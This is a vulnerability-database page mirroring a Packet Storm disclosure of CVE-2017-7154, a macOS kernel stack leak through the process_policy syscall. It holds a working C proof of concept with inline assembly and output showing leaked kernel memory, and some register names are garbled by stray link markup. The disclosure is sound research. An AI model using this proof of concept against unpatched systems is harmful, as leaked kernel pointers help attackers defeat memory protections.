Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

macOS process_policy Stack Leak

🗓️ 12 Jan 2018 00:00:00Reported by Jann HornType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 40 Views

macOS process_policy Stack Leak via Uninitialized Fiel

Related
Code
ReporterTitlePublishedViews
Family
0day.today		macOS - process_policy Stack Leak Through Uninitialized Field Exploit
12 Jan 201800:00
zdt
Tenable Nessus		macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)
10 Apr 201900:00
nessus
Tenable Nessus		Apple iOS < 11.2 Multiple Vulnerabilities (APPLE-SA-2017-12-13-6)
17 Apr 201900:00
nessus
Tenable Nessus		Apple TV < 11.2 Multiple Vulnerabilities
5 Jan 201800:00
nessus
Tenable Nessus		Apple iOS < 11.2 Multiple Vulnerabilities
7 Dec 201700:00
nessus
Tenable Nessus		macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)
7 Dec 201700:00
nessus
Tenable Nessus		macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)
7 Dec 201700:00
nessus
Apple		About the security content of watchOS 4.2
5 Dec 201700:00
apple
Apple		About the security content of iOS 11.2
2 Dec 201700:00
apple
Apple		About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan
6 Dec 201700:00
apple
Rows per page
`MacOS process_policy stack leak through uninitialized field   
  
CVE-2017-7154  
  
  
The syscall  
process_policy(scope=PROC_POLICY_SCOPE_PROCESS, action=PROC_POLICY_ACTION_GET, policy=PROC_POLICY_RESOURCE_USAGE, policy_subtype=PROC_POLICY_RUSAGE_CPU, attrp=<userbuf>, target_pid=0, target_threadid=<ignored>)  
causes 4 bytes of uninitialized kernel stack memory to be written to userspace.  
  
The call graph looks as follows:  
  
process_policy  
handle_cpuuse  
proc_get_task_ruse_cpu  
task_get_cpuusage  
[writes scope=1/2/4/0]  
[always returns zero]  
[writes policyp if scope!=0]  
[always returns zero]  
copyout  
  
  
If task_get_cpuusage() set `*scope=0` because none of the flags  
TASK_RUSECPU_FLAGS_PERTHR_LIMIT, TASK_RUSECPU_FLAGS_PROC_LIMIT and TASK_RUSECPU_FLAGS_DEADLINE are set in task->rusage_cpu_flags,  
proc_get_task_ruse_cpu() does not write anything into `*policyp`, meaning that `cpuattr.ppattr_cpu_attr` in  
handle_cpuuse() remains uninitialized. task_get_cpuusage() and proc_get_task_ruse_cpu() always return zero,  
so handle_cpuuse() will copy `cpuattr`, including the unititialized `ppattr_cpu_attr` field, to userspace.  
  
  
Tested on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:  
  
$ cat test.c  
#include <stdint.h>  
#include <stdio.h>  
#include <inttypes.h>  
  
struct proc_policy_cpuusage_attr {  
uint32_t ppattr_cpu_attr;  
uint32_t ppattr_cpu_percentage;  
uint64_t ppattr_cpu_attr_interval;  
uint64_t ppattr_cpu_attr_deadline;  
};  
  
void run(void) {  
int retval;  
struct proc_policy_cpuusage_attr attrs = {0,0,0,0};  
asm volatile(  
"mov $0x02000143, %%rax\n\t" // process_policy  
"mov $1, %%rdi\n\t" // PROC_POLICY_SCOPE_PROCESS  
"mov $11, %%rsi\n\t" // PROC_POLICY_ACTION_GET  
"mov $4, %%rdx\n\t" // PROC_POLICY_RESOURCE_USAGE  
"mov $3, %%<a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>\n\t" // PROC_POLICY_RUSAGE_CPU  
"mov %[userptr], %%<a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>\n\t"  
"mov $0, %%<a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>\n\t" // PID 0 (self)  
// target_threadid is unused  
"syscall\n\t"  
: //out  
"=a"(retval)  
: //in  
[userptr] "r"(&attrs)  
: //clobber  
"cc", "memory", "rdi", "rsi", "rdx", "<a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>", "<a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>", "<a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>"  
);  
printf("retval = %d\n", retval);  
printf("ppattr_cpu_attr = 0x%"PRIx32"\n", attrs.ppattr_cpu_attr);  
printf("ppattr_cpu_percentage = 0x%"PRIx32"\n", attrs.ppattr_cpu_percentage);  
printf("ppattr_cpu_attr_interval = 0x%"PRIx64"\n", attrs.ppattr_cpu_attr_interval);  
printf("ppattr_cpu_attr_deadline = 0x%"PRIx64"\n", attrs.ppattr_cpu_attr_deadline);  
}  
  
int main(void) {  
run();  
return 0;  
}  
$ gcc -Wall -o test test.c  
$ ./test  
retval = 0  
ppattr_cpu_attr = 0x1a180ccb  
ppattr_cpu_percentage = 0x0  
ppattr_cpu_attr_interval = 0x0  
ppattr_cpu_attr_deadline = 0x0  
  
That looks like the lower half of a pointer or so.  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: jannh  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Jan 2018 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.00093
macosprocess_policystack leakuninitialized fieldcve-2017-7154kernel stack memoryuserspacecpu usagemacmini7darwin 17.0.0code injectionbug reportdisclosure deadlinejannh
40